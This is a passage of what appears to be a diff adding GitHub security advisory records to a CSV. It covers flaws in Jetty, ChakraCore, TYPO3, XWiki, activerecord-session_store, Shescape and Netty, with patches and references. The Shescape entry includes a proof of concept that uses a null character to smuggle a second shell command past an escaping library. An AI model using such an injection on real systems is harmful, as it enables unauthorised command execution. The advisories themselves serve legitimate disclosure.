'https://nvd.nist.gov/vuln/detail/CVE-2021-21338'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/typo3/cms-core'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2021-001'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T01:41:01Z', 'nvd_published_at': '2021-03-23T02:15:00Z'}"
+1.4.0,GHSA-m394-8rww-3jr7,2021-10-21T14:14:05Z,2021-03-10T03:46:47Z,,['CVE-2020-27223'],DOS vulnerability for Quoted Quality CSV headers,"### Impact
+When Jetty handles a request containing request headers with a large number of “quality” (i.e. q) parameters (such as what are seen on the `Accept`, `Accept-Encoding`, and `Accept-Language` request headers), the server may enter a denial of service (DoS) state due to high CPU usage while sorting the list of values based on their quality values. A single request can easily consume minutes of CPU time before it is even dispatched to the application.
+
+The only features within Jetty that can trigger this behavior are:
+
+- Default Error Handling - the `Accept` request header with the `QuotedQualityCSV` is used to determine what kind of content to send back to the client (html, text, json, xml, etc)
+- `StatisticsServlet` - uses the `Accept` request header with the `QuotedQualityCSV` to determine what kind of content to send back to the client (xml, json, text, html, etc)
+- `HttpServletRequest.getLocale()` - uses the `Accept-Language` request header with the `QuotedQualityCSV` to determine which “preferred” language is returned on this call.
+- `HttpservletRequest.getLocales()` - is similar to the above, but returns an ordered list of locales based on the quality values on the `Accept-Language` request header.
+- `DefaultServlet` - uses the `Accept-Encoding` request header with the `QuotedQualityCSV` to determine which kind of pre-compressed content should be sent back for static content (content that is not matched against a url-pattern in your web app)
+
+### Versions
+`QuotedQualityCSV` was introduced to Jetty 9.3.9.v20160517 and the bug that introduced the vulnerability was in 9.4.6.v20170531.
+
+Currently, known vulnerable versions include:
+
+- 9.4.6.v20170531 thru to 9.4.36.v20210114
+- 10.0.0
+- 11.0.0
+
+### Workarounds
+
+Quality ordered values are used infrequently by jetty so they can be avoided by:
+
+ * Do not use the default error page/handler.
+ * Do not deploy the `StatisticsServlet` exposed to the network
+ * Do not call `getLocale` API
+ * Do not enable precompressed static content in the `DefaultServlet`
+
+### Patches
+
+All patches are available for download from the Eclipse Jetty website at [https://www.eclipse.org/jetty/download.php](https://www.eclipse.org/jetty/download.php)
+- 9.4.37.v20210219 and greater
+- 10.0.1 and greater
+- 11.0.1 and greater","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.4.6'}, {'fixed': '9.4.37'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.0.1'}]}], 'versions': ['10.0.0']}, {'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.0.1'}]}], 'versions': ['11.0.0']}]","[{'type': 'WEB', 'url': 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-m394-8rww-3jr7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-27223'}, {'type': 'WEB', 'url': 'https://bugs.eclipse.org/bugs/show_bug.cgi?id=571128'}, {'type': 'PACKAGE', 'url': 'https://github.com/eclipse/jetty.project'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r068dfd35ce2193f6af28b74ff29ab148c2b2cacb235995576f5bea78@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r07aedcb1ece62969c406cb84c8f0e22cec7e42cdc272f3176e473320@%3Cusers.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0b639bd9bfaea265022125d18acd2fc6456044b76609ec74772c9567@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0c6eced465950743f3041b03767a32b2e98d19731bd72277fc7ea428@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0cdab13815fc419805a332278c8d27e354e78560944fc36db0bdc760@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0e25cdf3722a24c53049d37396f0da8502cb4b7cdc481650dc601dbc@%3Cgitbox.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r105f4e52feb051faeb9141ef78f909aaf5129d6ed1fc52e099c79463@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1414ab2b3f4bb4c0e736caff6dc8d15f93f6264f0cca5c47710d7bb3@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1b7ed296a865e3f1337a96ee9cd51f6d154d881a30da36020ca72a4b@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1b803e6ebdac5f670708878fb1b27cd7a0ce9d774a60e797e58cee6f@%3Cissues.nifi.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r26d9196f4d2afb9bec2784bcb6fc183aca82e4119bf41bdc613eec01@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r27ad7843d060762cc942820566eeaa9639f75371afedf8124b943283@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2c2c7b2971360fb946bbf062c58d7245927dd1ce9150fc9987f65409@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2c947376491a20d1cf143bf3c21ed74113e099d806cfe4c490a45ad8@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r35ab810c0f3016b3fd3a3fa9088a2d2781b354a810780ce74d022b6c@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3ce0e31b25ad4ee8f7c42b62cfdc72d1b586f5d6accd23f5295b6dd1@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r409ee2bae66bfff6aa89e6c74aff535e6248260d3afcb42bfb3b316b@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r463b12b27264c5e1e3c48c8c2cc5d33813d2f0d981102548fb3102fb@%3Cissues.nifi.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r492cff8488a7f6eb96700afb5d137b719ddb80a833e77f971d2691c6@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4a456d89a83752a012d88a60ff4b21def6c9f650b9e69ea9fa11c9f9@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4c92ea39167c0f7b096ae8268db496b5451d69606f0304b7c8a994c7@%3Cissues.nifi.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r51f8975ef47c12a46fbfd7da9efea7f08e1d307fe1dc3042514659ae@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r521a077885ce79c44a799118c878589e81e525cab72d368e5cfb6f61@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5612dc69e1f79c421faf9764ffbc92591e2a69ea417c04cba57f49ea@%3Cuser.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r562a0cbc5c8cac4d000a27b2854a8ab1b924aa9dd45f8ffbea98e5ad@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5b7cc6ac733e0b35816751cf45d152ae246a3f40e0b1e62b101c9522@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r601f15f3de7ae3a7bbcd780c19155075c56443c2cdc1d193c03b4182@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r734f996149bb9b1796740385fcbdf3e093eb9aabedc0f20a48ea1d68@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r75ee2a529edb892ac59110cb3f6f91844a932c5034e16c8317f5668d@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7f4ad5eec0bce2821c308bb23cac53df5c94eb84de1c58de9b95c176@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7fbdb7880be1566f943d80fbbeefde2115c086eba1bef3115350a388@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7ffd050d3bd7c90d95f4933560b5f4f15971ab9a5f5322fdce116243@%3Cdev.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r855b24a3bde3674256152edfc53fb8c9000f9b59db3fecbbde33b211@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r857b31ad16c6e76002bc6cca73c83358ed2595477e288286ee82c48d@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r897a6a14d03eab09e89b809d2a650f3765065201da5bc3db9a4dd6e8@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8b1963f16d6cb1230ca7ee73b6ec4f5c48f344191dbb1caabd265ee4@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8dc1b13b80d39fbf4a9d158850e15cd868f0460c2f364f13dca7050b@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra2f529da674f25a7351543544f7d621b5227c49a0745913b1194d11e@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra384892bab8c03a60613a6a9d5e9cae0a2b800fd882792a55520115e@%3Ccommits.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra40a88a2301a3da86e25b501ff4bc88124f2b816c2917d5f3497f8f0@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra47a26c008487b0a739a368c846e168de06c3cd118d31ecedafa679a@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raa6d60b00b67c0550672b4f506f0df75b323dcd25cf574e91e2f2dff@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb79b62ac3085e05656e41865f5a7efcbdc7dcd7843abed9c5fe0fef8@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc052fd4e9e9c01bead74c0b5680355ea5dc3b72d46f253cb65d03e43@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc721fe2910533bffb6bd4d69ea8ff4f36066d260dbcd2d14e041614a@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd666e187ebea2fda8624683ab51e2a5ad2108f762d21bf1a383d7502@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd8e24a3e482e5984bc8c5492dc790413e4fdc1234e3debb94515796b@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdd6c47321db1bfe12c68a898765bf3b6f97e2afa6a501254ed4feaed@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re03a4dbc15df6f390a2f8c0a071c31c8324dbef007e59fdc2592091a@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re0d38cc2b5da28f708fc89de49036f3ace052c47a1202f7d70291614@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re19fa47ec901cc3cf6d7784027198e8113f8bc2dbfd6c9d6d13f5447@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re3bd4f831f9be49871cb6adb997289b5dbcd6fe4bc5cb08223254080@%3Cdev.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re43768896273c0b5f1a03d7f0a9d370852074489d51825fdc0d77f0f@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re819198d4732804dc01fca8b5b144689a118ede49f6128968773595c@%3Ccommits.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/reb3c6dc050c7ee18ea154cd94dba85d99aa6b02b84c4bb2138a4abf2@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/reca91f217f9e1ce607ce6e19a1c0b3db82b5b1b58cf39a84d6434695@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf190d1d28e1367d1664ef6bc2f71227566d7b6b39209817a5364da1f@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf6c2efa3137bc8c22707e550a1f9b80f74bca62b9c8a6f768f2c6b86@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf77f4c4583669f1133d58cc4f1964367e253818ed8db986bb2732f7c@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rff630ce92a4d1bb494fc1a3f9b57a3d60819b436505bcd8c6ccc713c@%3Ccommits.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210401-0005/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-10T03:46:22Z', 'nvd_published_at': '2021-02-26T22:15:00Z'}"
+1.4.0,GHSA-rx34-jff5-ph35,2021-03-18T21:48:50Z,2021-03-29T21:00:06Z,,['CVE-2019-0917'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0912, CVE-2019-0913, CVE-2019-0914, CVE-2019-0915, CVE-2019-0916, CVE-2019-0922, CVE-2019-0923, CVE-2019-0924, CVE-2019-0925, CVE-2019-0927, CVE-2019-0933, CVE-2019-0937.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0917'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/b5f8fad1b00087bd0a24cc173c2dfedc4f8aee33'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0917'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T21:48:50Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}"
+1.4.0,GHSA-2r6j-862c-m2v2,2021-03-29T18:01:54Z,2021-03-23T01:53:52Z,,['CVE-2021-21355'],Unrestricted File Upload in Form Framework,"
+### Problem
+Due to the lack of ensuring file extensions belong to configured allowed mime-types, attackers can upload arbitrary data with arbitrary file extensions - however, default _fileDenyPattern_ successfully blocked files like _.htaccess_ or _malicious.php_.
+
+TYPO3 Extbase extensions, which implement a file upload and do not implement a custom _TypeConverter_ to transform uploaded files into _FileReference_ domain model objects are affected by the vulnerability as well, since the _UploadedFileReferenceConverter_ of _ext:form_ handles the file upload and will accept files of any mime-type which are persisted to the default location.
+
+In any way, uploaded files are placed in the default location _/fileadmin/user_upload/_, in most scenarios keeping the submitted filename - which allows attackers to directly reference files, or even correctly guess filenames used by other individuals, disclosing this information.
+
+No authentication is required to exploit this vulnerability.
+
+### Solution
+Update to TYPO3 versions 8.7.40, 9.5.25, 10.4.14, 11.1.1 that fix the problem described.
+
+Type converter _UploadedFileReferenceConverter_ is not registered globally anymore and just handles uploaded files within the scope of the Form Framework. Guessable storage location has changed from _/fileadmin/user_upload/form\_\/_ to _/fileadmin/form_uploads/_. Allowed mime-types must match expected file extensions (e.g. _application/pdf_ must be _.pdf_, and cannot be _.html_).
+
+Extbase extensions, who rely on the global availability of the _UploadedFileReferenceConverter_ must now implement a custom _TypeConverter_ to handle file uploads or explicitly implement the ext:form _UploadedFileReferenceConverter_ with appropriate setting for accepted mime-types.
+
+### Credits
+Thanks to Sebastian Michaelsen, Marc Lindemann, Oliver Eglseder, Markus Volkmer, Jakob Kunzmann, Johannes Regner, Richie Lee who reported this issue, and to TYPO3 core & security team members Oliver Hader & Benni Mack, as well as TYPO3 contributor Ralf Zimmermann who fixed the issue.
+
+### References
+* [TYPO3-CORE-SA-2021-002](https://typo3.org/security/advisory/typo3-core-sa-2021-002)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L/E:F/RL:O/RC:C'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-form'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.7.40'}]}], 'database_specific': {'last_known_affected_version_range': '<= 8.7.39'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-form'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.25'}]}], 'database_specific': {'last_known_affected_version_range': '<= 9.5.24'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-form'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.14'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.4.13'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-form'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 11.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-2r6j-862c-m2v2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21355'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/typo3/cms-form'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2021-002'}]","{'cwe_ids': ['CWE-434', 'CWE-552'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T01:41:38Z', 'nvd_published_at': '2021-03-23T02:15:00Z'}"
+1.4.0,GHSA-pcgf-qjx2-qv4q,2021-03-23T15:04:45Z,2021-03-29T20:56:08Z,,['CVE-2019-1217'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1138, CVE-2019-1237, CVE-2019-1298, CVE-2019-1300.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.13'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1217'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/7e9a2ee60baa95ceb4f48f522f823c812ca90c80'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/b75847eb1ef4136d49e119c072266d8874a6e41e'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1217'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T15:04:45Z', 'nvd_published_at': '2019-09-11T22:15:00Z'}"
+1.4.0,GHSA-cvw2-xj8r-mjf7,2023-09-05T22:00:39Z,2021-03-09T00:45:31Z,,['CVE-2019-25025'],Activerecord-session_store Vulnerable to Timing Attack,"The `activerecord-session_store` (aka Active Record Session Store) component through 1.1.3 for Ruby on Rails does not use a constant-time approach when delivering information about whether a guessed session ID is valid. Consequently, remote attackers can leverage timing discrepancies to achieve a correct guess in a relatively short amount of time. This is a related issue to CVE-2019-16782.
+
+## Recommendation
+
+This has been fixed in version 2.0.0. All users are advised to update to this version or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'activerecord-session_store'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.1.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-25025'}, {'type': 'WEB', 'url': 'https://github.com/rails/activerecord-session_store/pull/151'}, {'type': 'WEB', 'url': 'https://github.com/rails/activerecord-session_store/commit/9d4dd113d3010b82daaadf0b0ee6b9fb2afb2160'}, {'type': 'PACKAGE', 'url': 'https://github.com/rails/activerecord-session_store'}, {'type': 'WEB', 'url': 'https://github.com/rails/activerecord-session_store/releases/tag/v2.0.0'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/activerecord-session_store/CVE-2019-25025.yml'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/activerecord-session_store'}]","{'cwe_ids': ['CWE-208'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-09T00:45:19Z', 'nvd_published_at': '2021-03-05T06:15:00Z'}"
+1.4.0,GHSA-2452-3rwv-x89c,2021-03-23T15:13:35Z,2021-03-29T20:56:01Z,,['CVE-2019-1298'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1138, CVE-2019-1217, CVE-2019-1237, CVE-2019-1300.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.13'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1298'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/7e9a2ee60baa95ceb4f48f522f823c812ca90c80'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/fe8f981f8e426ff61159e750a368e94ecbb87782'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1298'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T15:13:35Z', 'nvd_published_at': '2019-09-11T22:15:00Z'}"
+1.4.0,GHSA-79rg-7mv3-jrr5,2021-03-23T22:34:44Z,2021-03-23T22:48:01Z,,['CVE-2021-21380'],Rating Script Service expose XWiki to SQL injection,"### Impact
+This issue impacts only XWiki with the Ratings API installed.
+The Rating Script Service expose an API to perform SQL requests without escaping the from and where search arguments.
+This might lead to an SQL script injection quite easily for any user having Script rights on XWiki.
+
+### Patches
+The problem has been patched in XWiki 12.9RC1.
+
+### Workarounds
+The only workaround besides upgrading XWiki would be to uninstall the Ratings API in XWiki from the Extension Manager.
+
+### References
+https://jira.xwiki.org/browse/XWIKI-17662
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [Jira XWiki](http://jira.xwiki.org)
+* Email us at our [security mailing list](mailto:security@xwiki.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-ratings-api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-79rg-7mv3-jrr5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21380'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-17662'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T22:34:44Z', 'nvd_published_at': '2021-03-23T23:15:00Z'}"
+1.4.0,GHSA-f2rp-38vg-j3gh,2021-03-18T23:43:39Z,2021-03-18T23:47:56Z,,['CVE-2021-21384'],Null characters not escaped,"### Impact
+
+Anyone using _Shescape_ to defend against shell injection may still be vulnerable against shell injection if the attacker manages to insert a [null character](https://en.wikipedia.org/wiki/Null_character) into the payload. For example (on Windows):
+
+```javascript
+const cp = require(""child_process"");
+const shescape = require(""shescape"");
+
+const nullChar = String.fromCharCode(0);
+const payload = ""foo\"" && ls -al ${nullChar} && echo \""bar"";
+console.log(cp.execSync(`echo ${shescape.quote(payload)}`));
+// foototal 3
+// drwxr-xr-x 1 owner XXXXXX 0 Mar 13 18:44 .
+// drwxr-xr-x 1 owner XXXXXX 0 Mar 13 00:09 ..
+// drwxr-xr-x 1 owner XXXXXX 0 Mar 13 18:42 folder
+// -rw-r--r-- 1 owner XXXXXX 0 Mar 13 18:42 file
+```
+
+### Patches
+
+The problem has been patched in [v1.1.3](https://github.com/ericcornelissen/shescape/releases/tag/v1.1.3) which you can upgrade to now. No further changes are required.
+
+### Workarounds
+
+Alternatively, null characters can be stripped out manually using e.g. `arg.replace(/\u{0}/gu, """")`","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:L/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'shescape'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ericcornelissen/shescape/security/advisories/GHSA-f2rp-38vg-j3gh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21384'}, {'type': 'WEB', 'url': 'https://github.com/ericcornelissen/shescape/commit/07a069a66423809cbedd61d980c11ca44a29ea2b'}, {'type': 'WEB', 'url': 'https://github.com/ericcornelissen/shescape/releases/tag/v1.1.3'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/shescape'}]","{'cwe_ids': ['CWE-88'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T23:43:39Z', 'nvd_published_at': '2021-03-19T00:15:00Z'}"
+1.4.0,GHSA-f256-j965-7f32,2022-02-08T21:31:25Z,2021-03-30T15:10:38Z,,['CVE-2021-21409'],Possible request smuggling in HTTP/2 due missing validation of content-length,"### Impact
+The content-length header is not correctly validated if the request only use a single Http2HeaderFrame with the endStream set to to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1
+
+This is a followup of https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj which did miss to fix this one case.
+
+### Patches
+This was fixed as part of 4.1.61.Final
+
+### Workarounds
